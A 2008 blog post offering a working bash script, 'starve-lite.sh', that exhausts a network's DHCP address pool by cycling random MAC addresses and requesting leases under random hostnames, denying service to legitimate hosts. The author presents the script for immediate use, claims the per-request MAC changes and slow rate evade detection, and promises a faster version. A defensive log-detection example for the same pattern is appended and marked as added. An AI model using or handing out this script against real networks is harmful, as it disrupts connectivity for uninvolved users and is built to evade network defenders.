Wednesday, December 31, 2008

Shell Script - starve-lite.sh

I came upon something today that caught my attention: a way to "suck up" all the IPs on a network to essentially create a DoS. This is a DoS because you are denying legitimate computers on the network the ability to communicate with other computers on the network. There was a program that I could download to perform the DoS, but I wanted something that I could use right away without having to check for missing dependencies (note: this is a Linux script running on BackTrack 3).

It's rather simple.
1. Bring down the interface
2. Change the MAC
3. Bring up the interface
4. Send DHCP request w/ fake hostname
5. Calculate how long it took
6. Calculate how many are taken per minute & in the next 1/2 & full hour
7. Log what IPs have been taken

If you leave it running, it will try to snag an IP as soon as it becomes available. I have tested it on my network and I was able to get quite a few before I turned it off. Against the speed of my DHCP server, the script calculated that a whole "C" block would be taken within an hour. Plenty of time to do scans, vuln assessment, etc. while you wait.

Also, this method should evade detection because IP requests are coming from a different MAC every time. They are also coming at a slower rate (hence, starve-lite.sh). If you have any Cisco gear on which you can turn on detection and then run the script, please let me know how it goes. :) I should be releasing a faster-rate version soon that will gobble up as many as possible right away but has a greater chance of detection.



starve-lite.sh


#! /bin/bash

ref=`date +%s`
clear
while [ 1 ]
do
int="eth0"
stt=`date +%s`
ifconfig $int down
macchanger -rA $int
ifconfig $int up
rm -f /etc/dhcpc/*.pid
dhcpcd -h `echo "$RANDOM"` $int
ip=`ifconfig $int | grep inet | cut -d":" -f2 | awk '{ print $1 }'`
echo "$ip" >> /starve.txt
ent=`date +%s`
run=`expr $ent - $stt`
min=`expr 60 / $run`
half=`expr 1800 / $run`
hour=`expr 3600 / $run`
clear
echo "Total IP Leases Taken: `wc -l /starve.txt | awk '{ print $1 }'`"
echo "Running Time: $run Seconds"
echo "Approx. $min IP's Per Minute"
echo "Approx. $half IP's Per 1/2 Hour"
echo "Approx. $hour IP's Per Hour"
echo "---------------------------"
done
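
From the defender's side, the leases this script takes share a signature in the DHCP server log: a new MAC on every lease and a client hostname that is only a number from $RANDOM. The following is an added example, not part of the original post, that flags that pattern over a sliding window. The log format (ISC dhcpd syslog style), the function names and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/bash
# Added defender-side example; not part of the original post.
# Assumption: DHCP server logs in ISC dhcpd syslog style, all from one day:
#   <Mon> <day> <HH:MM:SS> <host> dhcpd: DHCPACK on <ip> to <mac> (<name>) via <if>

# detect_starvation WINDOW_SECONDS THRESHOLD   (log on stdin)
# Prints one ALERT line the first time THRESHOLD distinct MACs whose client
# hostname is a bare integer in 0..32767 (the range of bash $RANDOM, which
# the script passes to dhcpcd -h) are leased within WINDOW_SECONDS.
detect_starvation() {
  awk -v win="$1" -v thr="$2" '
    BEGIN { head = 1 }
    / DHCPACK on / {
      split($3, t, ":"); now = t[1] * 3600 + t[2] * 60 + t[3]  # second of day
      mac = ""; name = ""
      for (i = 1; i < NF; i++) if ($i == "to") { mac = $(i + 1); name = $(i + 2) }
      gsub(/[()]/, "", name)
      # Ordinary clients (named hosts, or no hostname at all) are skipped.
      if (name !~ /^[0-9]+$/ || name + 0 > 32767) next
      # Queue the lease and count each MAC once while it is in the window.
      n++; ts[n] = now; m[n] = mac
      if (cnt[mac]++ == 0) distinct++
      # Expire leases that fell out of the sliding window.
      while (ts[head] < now - win) { if (--cnt[m[head]] == 0) distinct--; head++ }
      if (distinct >= thr && !alerted) {
        printf "ALERT %s: %d distinct MACs with numeric hostnames in %ds\n", $3, distinct, win
        alerted = 1
      }
    }'
}

# Constructed sample log (addresses, MACs and hostnames are made up).
sample_log() {
  cat <<'EOF'
Dec 31 10:00:01 gw dhcpd: DHCPACK on 192.168.1.20 to 00:1e:c2:aa:10:01 (laptop-anna) via eth1
Dec 31 10:00:25 gw dhcpd: DHCPACK on 192.168.1.101 to 00:0d:4b:3f:91:a2 (18233) via eth1
Dec 31 10:00:50 gw dhcpd: DHCPACK on 192.168.1.102 to 00:a0:c9:17:5e:0b (4071) via eth1
Dec 31 10:01:15 gw dhcpd: DHCPACK on 192.168.1.103 to 00:50:ba:c4:22:9d (29950) via eth1
Dec 31 10:01:20 gw dhcpd: DHCPACK on 192.168.1.21 to 00:16:cb:bb:20:02 (printer2) via eth1
Dec 31 10:01:40 gw dhcpd: DHCPACK on 192.168.1.104 to 00:11:d8:6a:f0:33 (731) via eth1
Dec 31 10:02:05 gw dhcpd: DHCPACK on 192.168.1.105 to 00:e0:4c:08:7b:e4 (12006) via eth1
Dec 31 10:02:30 gw dhcpd: DHCPACK on 192.168.1.106 to 00:90:27:d1:45:6c (25519) via eth1
EOF
}

sample_log | detect_starvation 600 5
```

Because the script takes leases slowly, the window has to be minutes long rather than seconds; with a 30-second window the same sample never reaches a threshold of 3.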